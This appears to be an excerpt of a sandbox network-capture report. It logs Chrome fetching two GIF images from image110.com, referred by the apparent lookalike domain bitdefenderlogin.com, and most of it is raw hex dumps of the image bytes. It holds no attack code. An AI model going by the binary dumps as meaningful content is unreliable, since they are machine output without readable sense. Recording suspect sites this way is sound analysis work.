                                                                                                                                                          2024-06-09 22:40:31 UTC16384INData Raw: f2 51 1f 3f 2c 44 80 2a d4 63 7e 0f 3a 91 84 de 01 a3 ff 18 c2 7d a9 ad 10 01 4c 80 82 00 0a 90 45 a3 ad d0 6c 09 e0 00 00 ba a8 48 de 78 a0 91 c8 d0 5b df fe 16 b8 be 2d 43 6f 87 5b dc 2c 1d d7 87 fb f0 c8 0a e5 a1 83 34 e1 d0 4f 38 34 41 00 e6 e4 25 44 35 31 51 65 f2 08 15 dd e4 a6 45 89 c0 04 73 e0 62 11 ed 94 a7 2d a8 0a 53 22 d8 c2 1c 3c f2 25 36 59 4a 51 95 da 82 16 0d 65 a8 00 6c 01 8e ab da 42 a7 3e 15 2a 9c a9 e0 09 c8 a8 62 ac 08 ff 0c ab 61 e1 f1 c0 cf f2 c0 21 45 f0 2c 43 4a cb c1 d2 ba 86 14 f6 78 ab 58 c0 01 10 22 c0 16 25 06 f9 c8 49 6e 8b c3 44 18 c1 26 29 41 0b 63 50 a2 93 99 6c c2 27 57 dc 04 2e 38 e3 c5 2f 46 c2 8c 43 31 63 1b cf 78 04 44 30 46 1e 5a f9 90 52 ce 63 1d eb ca 81 31 3a 01 8f 64 e6 00 5f c0 e8 c4 1f 4a e9 04 7f c5 62 1e 03
                                                                                                                                                          Data Ascii: Q?,D*c~:}LElHx[-Co[,4O84A%D51QeEsb-S"<%6YJQelB>*ba!E,CJxX"%InD&)AcPl'W.8/FC1cxD0FZRc1:d_Jb
                                                                                                                                                          2024-06-09 22:40:31 UTC16384INData Raw: 42 31 bd e8 b5 a2 7a a5 18 5e 30 be 09 bd e3 cd ee 3f f0 81 29 4f e1 a3 53 9d c2 07 7f f3 9b 5f 52 ad 0a 1f fb c0 07 80 dd f1 46 3b 1a 38 8e a0 da 53 ad f6 b8 9b 59 d5 6a 90 bc 9a f0 af 08 79 c8 62 11 b0 58 c7 42 64 24 8d e5 ac 47 46 52 92 d2 a2 24 b6 ae a5 ad 6c 61 92 5a e0 9a 96 b8 98 15 4a 70 a1 f2 5c a3 24 a5 9b 40 a9 ca 1b 93 eb 5e af dc f1 bf 62 d9 af 81 cd 72 96 6e d2 65 2d 13 56 4b 39 ed e3 1f fb 00 09 3b d8 f1 02 2b ec 03 39 07 88 ff 83 9e 5e 30 84 7c dc 83 1e df 88 c3 3d ec 10 87 01 14 a0 04 96 88 43 09 24 62 87 4f 58 60 67 0a b0 c3 1e 10 31 06 0b ec 61 67 10 29 c5 34 c7 10 11 3b 84 99 1e fc f8 c7 47 9a 86 b0 a6 81 ed 9f 0b 18 01 d3 3c 02 36 81 82 e5 2b 5e f1 4a 58 18 0d b7 b5 a4 e5 2f ff 08 c5 08 a4 50 69 7b f2 23 14 13 c5 28 17 a4 50 95 87 f2
                                                                                                                                                          Data Ascii: B1z^0?)OS_RF;8SYjybXBd$GFR$laZJp\$@^brne-VK9;+9^0|=C$bOX`g1ag)4;G<6+^JX/Pi{#(P
                                                                                                                                                          2024-06-09 22:40:31 UTC16384INData Raw: a7 a3 21 97 8b 75 a9 9d 02 a3 0e 47 20 06 80 e9 30 1d 01 98 62 20 06 37 20 67 66 20 01 c9 08 03 12 10 0c 8a 19 22 d6 14 0d 8d 49 08 53 84 a5 0c 98 05 f8 d0 8e 9a 36 68 02 e1 4d 0a 01 0a 75 e9 3a 16 70 05 4a 20 9a f0 a1 05 98 10 0b 6f 72 00 6d 45 17 66 42 4f ee 18 4f 12 e4 40 2c 88 4f f6 98 33 03 31 25 b9 29 5d 38 88 10 bd d9 a7 ff 64 42 3e e8 33 5a 51 77 c1 59 10 f1 ff 40 9c 45 c8 50 6b c2 26 0c 35 5e 00 e0 43 70 e1 26 11 f9 9c 2f 00 91 6c 01 91 59 80 9d b6 b2 6b f6 a0 45 40 ea 93 68 13 45 27 05 60 d1 e6 1e b1 71 45 7f a1 79 9a 67 10 33 75 9e e8 f9 85 9b 77 9e 26 e9 60 f5 f5 02 f4 59 87 f7 c9 92 bd 3a 87 0c 20 0d 8a e0 00 1a 90 86 0d 01 1b 75 e3 1a 2b 10 a0 f5 02 a0 c6 83 2f 3e 79 a0 85 a8 7b aa 92 39 9b f3 a0 bf 71 94 bd 51 1c b6 c2 2d db da 7c 06 37 2b
                                                                                                                                                          Data Ascii: !uG 0b 7 gf "IS6hMu:pJ ormEfBOO@,O31%)]8dB>3ZQwY@EPk&5^Cp&/lYkE@hE'`qEyg3uw&`Y: u+/>y{9qQ-|7+
                                                                                                                                                          2024-06-09 22:40:31 UTC16384INData Raw: c2 c1 ff d2 4a 0c 4e c5 52 68 52 51 83 72 4e 15 55 4e 1d 95 28 6d 4d 4d d5 b4 52 64 12 0b 04 4b b0 b0 c0 16 9a 52 0c 32 f5 52 03 cb ad b0 52 2a 57 48 02 71 e5 5c 04 b3 20 84 85 1a 41 a0 2c df ad 13 54 44 8d 40 b0 2d ff 2d 16 dc 0d b4 34 2b 08 5a 8b 87 c2 40 20 e6 e0 8a 68 21 0a 2b 80 04 ca 85 06 d5 cd 8c 92 84 1c 80 25 16 54 44 55 db cc 59 99 35 87 92 55 5a fd 22 88 ff 56 93 2f 40 d0 20 36 33 61 a4 e2 b9 3c 20 08 dc 88 e3 d6 22 8c 06 c9 2d 0e 89 bc c8 6b 35 c5 90 32 bc c1 05 da d5 5d df 15 5e dd b5 08 28 e9 63 2c e3 64 5e c1 e7 4e 26 16 e0 30 bd 80 a6 0e 26 8c e8 84 b3 0e 6c ae 28 ea 00 67 ea f0 c0 5e 61 0d dc eb 63 3a 60 10 3b c0 08 4c ee 97 2a 69 5d dd 65 bd 3c a6 11 ab 2e 0d ca 93 38 04 61 eb be a6 12 39 40 0a 40 0c c4 fc a5 07 e4 13 3b ce ae c5 b4 83
                                                                                                                                                          Data Ascii: JNRhRQrNUN(mMMRdKR2RR*WHq\ A,TD@--4+Z@ h!+%TDUY5UZ"V/@ 63a< "-k52]^(c,d^N&0&l(g^ac:`;L*i]e<.8a9@@;
                                                                                                                                                          2024-06-09 22:40:31 UTC15042INData Raw: 69 a6 ea 6a f2 04 3b b8 26 25 b2 a6 d7 41 eb 23 ae 5d 41 cc e6 da 3d 22 d6 05 59 6f fe e2 30 79 2b 6f 8a 6b d8 30 5e e2 e1 46 6e 20 0e 90 39 59 da 39 99 3d d9 93 e3 f5 44 e7 e5 e2 77 f2 62 73 d2 22 42 8d 0d 37 19 99 bd de 53 92 e9 e2 3f e8 22 97 31 27 84 38 5e 78 80 5e e8 45 23 9d 5d 63 35 ea 99 7e e2 e7 3f 60 a3 4e 88 8e ec 5c d4 45 e5 27 00 bc 02 00 80 23 c6 e6 27 ff 38 ae c1 a8 39 9a 83 22 e8 90 48 10 24 a4 d4 a8 8d 2c 91 a0 c0 f3 90 5a f5 70 4a 8b 10 c1 17 f8 00 23 e0 02 23 3c 01 15 50 c1 13 64 43 2a 00 24 20 00 c2 13 44 42 f5 18 a4 cf f2 ec 24 18 ed 43 22 ad f9 9c 4f 2b b4 5a 8b 62 95 b2 c8 68 b1 14 cb 16 08 87 00 70 c0 02 88 95 18 04 00 00 01 e9 37 38 42 78 09 a9 75 19 5b 41 54 69 8e a4 41 92 32 50 12 10 c1 3a e4 00 4c e6 c0 4c 46 a9 b2 51 a9 b2 bd
                                                                                                                                                          Data Ascii: ij;&%A#]A="Yo0y+ok0^Fn 9Y9=Dwbs"B7S?"1'8^x^E#]c5~?`N\E'#'89"H$,ZpJ##<PdC*$ DB$C"O+Zbhp78Bxu[ATiA2P:LLFQ


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          7192.168.2.549722103.85.191.784434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:30 UTC627OUTGET /uploads/5a3c598b993dd0d99c3e7a68e0323f3b.gif HTTP/1.1
                                                                                                                                                          Host: www.image110.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: http://www.bitdefenderlogin.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:30 UTC348INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:30 GMT
                                                                                                                                                          Content-Type: image/gif
                                                                                                                                                          Content-Length: 370771
                                                                                                                                                          Last-Modified: Fri, 15 Mar 2024 03:23:54 GMT
                                                                                                                                                          Connection: close
                                                                                                                                                          ETag: "65f3bf4a-5a853"
                                                                                                                                                          Expires: Tue, 09 Jul 2024 22:40:30 GMT
                                                                                                                                                          Cache-Control: max-age=2592000
                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:40:30 UTC16036INData Raw: 47 49 46 38 39 61 e8 03 64 00 f7 ff 00 ff fc 6b 01 8f fe b0 09 08 e9 10 10 ff fe ce 33 c9 4c 66 b0 f4 00 af fe 1b b7 37 fe eb 34 6b d7 e7 97 ed a3 ff b8 21 72 6d 66 f4 d7 8c f8 f6 ef 01 01 00 ef d1 70 d9 22 23 f4 cf 52 8a 78 5c 29 bb 43 02 78 f3 d0 b2 4f 70 d6 a0 da d9 d5 1f 60 ab b4 8f 2c d0 b0 2e ff d6 23 f8 70 6f ff 68 00 6d 28 0e ff b8 00 ff f8 55 d0 b4 6c 0f 65 1f 42 d3 5a 92 10 0c 73 12 0d 21 ff f7 ad 93 0a ae 91 4a ff fe b9 8e 6e 2d ff fe aa fd e7 01 c9 12 14 ff f7 00 ad a6 93 4b d6 64 ff 9b 00 a6 e2 56 ff ef 45 fc 89 89 c8 97 2e 70 4b 11 b1 af ae 6f 4e 2b d7 cc 70 dd 18 21 ff fe 98 ff fe 85 da cd 8b 8d 27 0f ff ca 18 b8 a7 50 f0 51 51 f7 d6 d5 51 29 09 ff 2c 00 db ca 50 fe a6 a5 3d 95 33 b5 a9 6a fe e7 97 8c 6c 11 f0 da ae 04 91 d8 b4 aa 2d af 77
                                                                                                                                                          Data Ascii: GIF89adk3Lf74k!rmfp"#Rx\)CxOp`,.#pohm(UleBZs!Jn-KdVE.pKoN+p!'PQQQ),P=3jl-w
                                                                                                                                                          2024-06-09 22:40:30 UTC16384INData Raw: 80 55 18 e4 8f 7e ce 21 55 e3 09 5c 96 75 1c 9d 2d e2 e8 2d 52 cf f5 dc 40 22 d4 e0 d4 45 9f 9c 7c a6 0e d0 81 15 e0 0e a4 71 81 6d e4 9d 12 54 45 b0 ac 99 b9 f8 0e 0e 5c 1d 66 71 c1 6c b2 00 1e 3c 16 85 7a d5 47 58 c1 11 dc 00 cc ad 9a 70 26 86 a0 22 27 61 18 8c 15 98 c5 06 5c 80 f5 c1 5a 74 da e8 43 5e a2 14 ae 47 4e 5a 27 0a 6d 57 7e 4c 9b 79 24 94 ea 65 e4 10 31 0d ce 1c d4 e8 c1 d7 79 8e 47 7a 62 c8 1a b6 87 b4 a1 d4 7d fa 93 19 62 d4 80 c2 5e 7d cc 24 b7 d1 5e ec 05 58 81 46 08 29 10 c9 52 25 0d f0 e1 48 17 45 88 3b f8 c8 7c 10 e5 8d 78 d8 90 20 28 86 4c a2 25 22 dd 85 56 22 b3 52 8f 3e 52 0f 2f e0 81 45 6c 28 5d 7c 04 1f 18 0a 30 62 95 30 00 c1 c3 b9 44 9d f0 c2 1a 98 4b 4a 90 a5 ea 00 81 25 4d 23 64 46 eb a3 da a8 25 be 00 3f 16 8f 56 8c 40 01 59
                                                                                                                                                          Data Ascii: U~!U\u--R@"E|qmTE\fql<zGXp&"'a\ZtC^GNZ'mW~Ly$e1yGzb}b^}$^XF)R%HE;|x (L%"V"R>R/El(]|0b0DKJ%M#dF%?V@Y
                                                                                                                                                          2024-06-09 22:40:31 UTC16384INData Raw: fb e4 54 b4 5c 89 a3 dd 0e ca e3 55 fd 11 8b 6a 3c 89 ae b8 c0 a4 f0 b7 06 25 d4 80 ab 8b d4 84 41 0f 2d 18 85 f5 d0 26 3d db 69 ad 57 34 95 48 13 68 00 ce 68 57 f5 31 06 b5 3d 89 e3 ab 3e 8b 30 d6 a1 43 5b b4 2d 56 0d 4d c8 51 33 89 42 1c 08 4f 30 8d 72 f0 c1 70 64 d3 a1 7b d7 6d 2d 08 16 70 c8 7f c8 b9 8e 23 08 26 20 d3 e6 1b 5c 83 d4 0e bb 35 09 e2 d1 db 89 55 9f 81 25 08 d0 c3 8a e4 f8 57 ed f0 41 c0 3c dd b0 0d 5b bf 5c 8e ec 1c 59 d7 7d dd 91 0d ca 82 80 05 9d 04 59 d8 bd 5d ef 90 ae ad 20 41 d9 0a c5 95 fd 8f ff cc 73 59 53 cc 0c 54 d4 b7 f6 bc 4b 9b 2d d4 97 68 8b 8c 8a 8a a4 e5 bf c4 81 55 00 8c da e7 da 89 4e 38 2a a9 58 9c b2 64 1c a2 65 16 b9 8b 16 ea 75 4b ab 85 9a a9 e5 87 93 3d 89 ac 22 89 46 e2 5a b1 b0 55 bd ac 8b b2 f5 4d 14 14 39 15 c4
                                                                                                                                                          Data Ascii: T\Uj<%A-&=iW4HhhW1=>0C[-VMQ3BO0rpd{m-p#& \5U%WA<[\Y}Y] AsYSTK-hUN8*XdeuK="FZUM9
                                                                                                                                                          2024-06-09 22:40:31 UTC16384INData Raw: 5c 91 40 e8 f9 4a b0 a4 b5 8b 20 c6 f8 e9 4f b3 34 8a 60 fc 00 fd a3 ba 0f 13 cf b0 64 28 b7 c4 0a 6a cc 1a 7f 69 32 bd f4 8a 38 30 0c 2a 88 50 82 e0 cb c5 03 c7 bf 14 8c c9 09 cc 6f 0b 3d 70 63 bf 61 0a bd ea 24 51 e9 3c d1 cd 5c 4d 05 e3 01 5e 20 2a 01 a0 00 50 2a 88 3e 4c d1 8b e0 b7 82 98 26 c7 5c 4d c4 34 51 1e 65 bf bb 6a 4c 89 f8 81 26 aa 08 3d 64 08 3c 74 89 ef ab 08 1a 85 4c 9c cc cc 88 c8 82 1b 28 2b e2 54 bf 88 60 81 d7 e4 82 50 59 34 82 88 43 98 a4 88 4b 43 d1 e5 c4 49 97 2c 43 97 c8 0e 28 a8 83 8d 0c 2a 11 55 43 ff 10 05 d1 25 0c 90 4f ec 4e 39 85 31 60 89 89 71 99 53 01 d4 2c a4 e1 ba 17 7c 4a 2f ba 8b a7 4c 4a 31 12 9b 79 3a a3 61 f3 9a 4c 4c 89 6f c1 15 9e ac 15 fd 04 cb 0c 5c 1f 88 1a c0 00 75 46 1f e1 b1 17 d4 40 fb 01 2c 23 c8 ca 48 0d
                                                                                                                                                          Data Ascii: \@J O4`d(ji280*Po=pca$Q<\M^ *P*>L&\M4QejL&=d<tL(+T`PY4CKCI,C(*UC%ON91`qS,|J/LJ1y:aLLo\uF@,#H
                                                                                                                                                          2024-06-09 22:40:31 UTC16384INData Raw: e4 64 d6 82 08 07 7f 24 94 cc 1c c7 c0 54 56 70 fd 4c c6 74 d3 7f c8 82 2f e5 88 0d d0 48 86 60 81 f6 42 d3 62 d5 18 82 50 57 93 e0 56 df 6c 4c 9c 33 85 eb 5c c4 6b 65 08 2f e0 af 0d d8 00 21 88 80 91 c4 39 8b 6c c3 93 d0 0d 91 2b d6 71 64 51 49 11 80 22 15 88 85 79 41 32 51 d8 77 fd 48 ff 85 3d 31 3d c5 0e 79 fd 8e 2f c0 0e 3c e8 94 4b 09 59 91 8d 8e 3f 1d 8b f5 c3 ba 8f 42 54 f4 33 54 92 7a c6 f6 93 88 f7 93 ca ad 92 bf d5 aa ad 93 e8 0f ff 78 c5 fa b8 28 62 f4 54 b4 44 50 81 c8 01 9e 12 d0 fd 43 81 53 fd 07 57 35 a6 ba 0b 50 fb e4 54 b4 5c 89 a3 dd 0e ca e3 55 fd 11 8b 6a 3c 89 ae b8 c0 a4 f0 b7 06 25 d4 80 ab 8b d4 84 41 0f 2d 18 85 f5 d0 26 3d db 69 ad 57 34 95 48 13 68 00 ce 68 57 f5 31 06 b5 3d 89 e3 ab 3e 8b 30 d6 a1 43 5b b4 2d 56 0d 4d c8 51 33
                                                                                                                                                          Data Ascii: d$TVpLt/H`BbPWVlL3\ke/!9l+qdQI"yA2QwH=1=y/<KY?BT3Tzx(bTDPCSW5PT\Uj<%A-&=iW4HhhW1=>0C[-VMQ3
                                                                                                                                                          2024-06-09 22:40:32 UTC16384INData Raw: ca ab 32 d6 c3 c9 c1 84 8f a3 e3 86 c1 04 3d ec 6a 42 8f dc 2e f8 58 c2 c6 64 ab 6a ca 42 7d 2c 08 96 ac cc 61 a2 cc d0 b3 2b bb 32 ba c2 fc 43 c3 e4 cc 21 9a be 8a a8 03 93 94 08 28 78 c8 b5 62 3d 9a 92 b4 d3 b4 88 2c 64 bd 2c 54 c9 7f 30 85 0d 40 49 8e c4 4c 86 60 02 13 aa 03 28 b8 80 91 9c 88 ff 4d 50 03 86 20 cd 89 08 8e d0 49 4c 8f 94 c8 f5 10 3f 6e 02 ba 80 94 4d 35 84 0d 26 64 4e 29 fa b4 9f 14 9a ad cc 45 0e 7c b1 e7 c0 ce 68 09 35 ec 31 46 52 4c ad b0 50 c6 0e c3 b5 82 20 cb 09 d4 3b 57 e3 07 f6 24 4f 8e 88 cf f7 1c 0b 5c 91 40 e8 f9 4a b0 a4 b5 8b 20 c6 f8 e9 4f b3 34 8a 60 fc 00 fd a3 ba 0f 13 cf b0 64 28 b7 c4 0a 6a cc 1a 7f 69 32 bd f4 8a 38 30 0c 2a 88 50 82 e0 cb c5 03 c7 bf 14 8c c9 09 cc 6f 0b 3d 70 63 bf 61 0a bd ea 24 51 e9 3c d1 cd 5c
                                                                                                                                                          Data Ascii: 2=jB.XdjB},a+2C!(xb=,d,T0@IL`(MP IL?nM5&dN)E|h51FRLP ;W$O\@J O4`d(ji280*Po=pca$Q<\
                                                                                                                                                          2024-06-09 22:40:32 UTC16384INData Raw: 8e 08 34 e6 10 3d ce 08 30 88 49 1f 7e 84 34 7e 44 d1 ff 82 f8 4d 44 82 85 9c c4 8e 49 94 94 2d e8 0e 4d bc d3 14 e8 c9 e9 e8 03 3c bd d3 d3 b0 ba 4f a4 96 47 82 cb f0 a4 08 4a d2 08 b0 e3 ba 4c 22 3b a9 3c 3b 9b 08 25 23 8a 54 49 65 04 0e 54 8f 49 bd 54 4d 32 a4 58 e2 09 02 b5 bb a9 68 4b 81 e8 84 9d c0 80 5b 8c 3b fd c4 45 b9 6b 32 74 3b 89 e6 f2 4f b4 04 55 d8 10 0b 66 93 14 da 82 ca 86 e8 0a 17 a0 26 10 84 88 7e 1b a5 0f f8 80 73 c9 cb 86 e8 11 6e 78 52 80 d1 d0 1a 05 51 c0 f4 47 be 4c 4c d6 6c 88 27 95 33 10 a5 51 c5 78 d2 e4 64 d6 82 08 07 7f 24 94 cc 1c c7 c0 54 56 70 fd 4c c6 74 d3 7f c8 82 2f e5 88 0d d0 48 86 60 81 f6 42 d3 62 d5 18 82 50 57 93 e0 56 df 6c 4c 9c 33 85 eb 5c c4 6b 65 08 2f e0 af 0d d8 00 21 88 80 91 c4 39 8b 6c c3 93 d0 0d 91 2b
                                                                                                                                                          Data Ascii: 4=0I~4~DMDI-M<OGJL";<;%#TIeTITM2XhK[;Ek2t;OUf&~snxRQGLLl'3Qxd$TVpLt/H`BbPWVlL3\ke/!9l+
                                                                                                                                                          2024-06-09 22:40:32 UTC16384INData Raw: 10 dc 14 12 94 41 40 5b 3a 5b 21 3b da d9 8b 4e 91 c8 b5 9b c1 ff 52 eb 34 d4 2a 80 1a ac b4 a4 63 c2 bb a8 c8 ab d3 8b 1b 94 8b 59 3a 8c 27 4c c9 8c 14 b4 44 53 8c 94 74 95 bf 60 c2 18 5c c9 ce 18 ae b8 d3 88 d0 98 bb 6b a9 02 11 10 39 56 cc c3 cc 7b 45 11 90 3c f5 92 86 3f 5c 84 4a d0 bc 38 5c ca 39 84 43 30 7c 3c e5 e0 49 9f 74 45 a0 d4 bc 56 34 c4 00 d8 c2 a0 0c 4a 5f 63 0e 5d d3 43 ac 1c 2f f9 90 8f d5 d3 36 84 69 a8 8b 41 21 ad b4 ca b5 dc c2 b4 dc ca c1 43 4b 07 d2 43 ba a4 cb 31 dc c2 ba cc 4b 5e 53 18 3b b0 ca 08 da 42 29 90 80 78 63 4b b8 6c cb cc 93 98 6e 7b c5 a0 24 4c c5 d4 c2 7c 43 4c 53 80 4b dc 33 85 2b a0 4c cb ac 4c cc bc 4c cd c4 cc b3 d4 bd 80 b1 3e 84 fb c5 62 1c 46 63 2c cd 61 2c 89 8c 53 82 40 61 8a 73 38 07 73 48 09 67 ec 9b 6a 8c
                                                                                                                                                          Data Ascii: A@[:[!;NR4*cY:'LDSt`\k9V{E<?\J8\9C0|<ItEV4J_c]C/6iA!CKC1K^S;B)xcKln{$L|CLSK3+LLL>bFc,a,S@as8sHgj
                                                                                                                                                          2024-06-09 22:40:32 UTC16384INData Raw: 02 bd 48 95 13 68 95 55 89 95 57 a9 95 59 c9 95 5b e9 95 5d 09 ff 96 5f 29 96 5d 39 96 65 19 96 67 69 96 69 c9 95 53 99 8a 98 f0 94 4f 49 06 65 80 82 2d 01 0c 1a 50 8c c6 58 7a 8f 56 70 7b c9 97 7d e9 97 7f 09 98 81 29 98 83 49 98 85 69 98 87 89 98 89 39 83 06 57 7a 77 39 07 c0 b0 3a b0 00 04 0c a3 08 bc 00 8f 93 06 63 99 a9 99 9b c9 99 9d e9 99 9f 09 9a a1 29 9a a3 49 9a a5 69 9a a7 89 9a a9 39 84 18 67 8d 40 80 0c f2 08 06 f5 d8 3a 3a d7 12 d5 33 93 33 b7 90 9f 68 52 a0 a8 90 4f 48 9b 6e a8 7b 41 26 85 4d 97 93 2d f9 89 1d 59 9b b9 e9 51 ca 69 89 cc 39 14 24 19 9c f7 57 51 d5 53 87 db e7 9b a0 48 93 44 d1 74 1b 75 7f b8 69 87 93 58 51 c3 f9 91 d0 09 9c da d7 9d c8 a9 12 6c 47 9b f6 a7 5a c4 59 9d d4 73 9b 5f f7 5a 45 82 05 4d 29 03 a4 f0 94 a4 d0 94 6e
                                                                                                                                                          Data Ascii: HhUWY[]_)]9egiiSOIe-PXzVp{})Ii9Wzw9:c)Ii9g@::33hROHn{A&M-YQi9$WQSHDtuiXQlGZYs_ZEM)n
                                                                                                                                                          2024-06-09 22:40:32 UTC16384INData Raw: ee 48 30 ea c3 80 50 4d d8 0f 0b 50 aa 39 02 01 15 8c 80 39 62 e1 c3 4c a1 ac c2 5c ce 92 e6 8e fe 03 3b 94 03 d0 d6 aa 44 76 ae e5 da ff 65 38 a4 0c 41 32 58 89 aa 0f 92 f8 ec 7c 9d ae a5 99 6e 22 5d 2e 51 18 ab 4e 69 eb 0d 71 eb 48 a4 26 d3 72 6d 2f dc cd b3 9a eb d5 e6 26 2b 92 86 d7 7e 2d d4 9a a2 95 3e 81 6e 12 0e 91 da 53 b9 ee 2e b8 72 2d 91 02 de 6d 0a a2 44 24 6b c3 94 48 28 20 6c 2d b4 d1 82 88 27 46 3c 0f 10 ea 51 8b 58 2f f6 6a ef 9d fa e4 ba f4 4e ea a4 af ba 6c af 49 00 ac e0 be 2f 11 12 6e c3 50 c0 48 84 81 4c b0 00 a3 85 d5 3f e8 c0 cd 54 85 30 20 28 8b 78 57 2c b1 ea ae 92 2a c9 95 e8 8c 5a 2e 8c a2 a3 1f ea 5a e9 2a 92 c5 f8 ec af 92 5c 50 cc 28 37 fc 6a c9 a1 ee 42 d4 68 f7 a0 4d 3a f2 ec 06 c7 1e d0 da c8 89 ee 54 a4 dc 26 f0 ee ee b3
                                                                                                                                                          Data Ascii: H0PMP99bL\;Dve8A2X|n"].QNiqH&rm/&+~->nS.r-mD$kH( l-'F<QX/jNlI/nPHL?T0 (xW,*Z.Z*\P(7jBhM:T&


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          8192.168.2.549724103.85.191.784434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:30 UTC627OUTGET /uploads/0c3fb40c0b1b142849b7f16af333a5f2.gif HTTP/1.1
                                                                                                                                                          Host: www.image110.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: http://www.bitdefenderlogin.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:30 UTC348INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:30 GMT
                                                                                                                                                          Content-Type: image/gif
                                                                                                                                                          Content-Length: 335177
                                                                                                                                                          Last-Modified: Fri, 15 Mar 2024 03:23:34 GMT
                                                                                                                                                          Connection: close
                                                                                                                                                          ETag: "65f3bf36-51d49"
                                                                                                                                                          Expires: Tue, 09 Jul 2024 22:40:30 GMT
                                                                                                                                                          Cache-Control: max-age=2592000
                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:40:30 UTC16036INData Raw: 47 49 46 38 39 61 e8 03 64 00 f7 ff 00 23 16 08 00 93 bd ff ff 01 19 a5 cf 9d 01 00 94 88 4a 8d 6e 0b ff fa cc 6c 51 0a d8 94 0b cc b3 53 f7 d5 29 cd bb 65 45 31 16 b5 8f 0d f8 ec a8 d7 d5 d5 ef 00 ff fd fc f7 88 71 30 ff fe d9 cf ad 2a a7 96 4f 91 8e 8d ab ac aa e5 b3 2c d4 a8 11 f9 ed 86 8a 79 44 ff fb 95 f2 cf 0f ed de 75 17 10 06 ff ff a9 69 55 2b 74 68 33 e7 cc 68 ff 68 68 62 cd ee ba af 68 e5 0d 0b b2 92 2c ff ff eb 41 39 37 ef ce 88 6e 6d 6c eb b8 44 0c 5f 67 32 2e 2b b6 a6 55 d4 95 37 42 b5 d8 ff ff 14 f8 ec 9a 57 44 05 76 6b 49 ff ff 26 ff d6 d5 10 08 00 ff ff 77 d4 c9 8f dc c6 64 08 08 00 e9 d6 6a ff ff 56 ed d8 95 93 84 2e ff ff 35 f7 5a 21 ff ff 46 58 46 23 f5 46 05 72 00 00 50 4e 49 ed eb 85 15 6e 8d ff 99 99 7c 62 0a f7 9f ff ff ee 75 8b 86
                                                                                                                                                          Data Ascii: GIF89ad#JnlQS)eE1q0*O,yDuiU+th3hhhbh,A97nmlD_g2.+U7BWDvkI&wdjV.5Z!FXF#FrPNIn|bu
                                                                                                                                                          2024-06-09 22:40:30 UTC16384INData Raw: 01 ba df 54 a6 df 47 6e e4 fc 41 e0 05 7a 69 4a 1e 65 81 80 e9 ff e5 1a 81 70 e9 81 18 64 3f 68 20 80 e4 64 80 08 64 3f 5c 40 b1 b5 24 01 ea e4 98 1a a5 81 5c 83 5a 24 e0 ff 1d e5 53 06 c8 b5 71 24 9a 4e 48 7f 18 64 7e 40 01 06 68 42 d7 3c 12 24 b5 5b 90 9a 25 89 04 0f 0b 5e d2 20 d4 43 9b 84 c2 04 e8 82 0f e8 02 c0 75 09 20 80 80 92 a8 d2 1a a4 a1 5c 86 c1 0f c0 80 0f 20 40 0a b0 16 02 18 41 03 c8 56 19 e8 82 31 25 49 05 6c 57 13 c0 81 05 60 d7 c6 31 42 21 4c 00 ca 65 66 5a fa 89 37 1d 0a a1 d0 22 d0 4d 80 77 25 ab 77 11 cf ba 58 00 b2 2e ab 05 44 6b 0c e8 e0 3d cd 53 50 cc a6 3e 31 5d 35 38 9d a9 90 c3 6e aa 83 41 58 40 35 80 02 07 58 1d 78 ee 4f 35 70 c4 70 86 eb 46 d0 c1 a2 70 84 40 e9 cf 84 9d 9d 41 94 ff 04 26 52 01 76 16 80 3a 6c 27 15 d4 d2 c9 81
                                                                                                                                                          Data Ascii: TGnAziJepd?h dd?\@$\Z$Sq$NHd~@hB<$[%^ Cu \ @AV1%IlW`1B!LefZ7"Mw%wX.Dk=SP>1]58nAX@5XxO5ppFp@A&Rv:l'
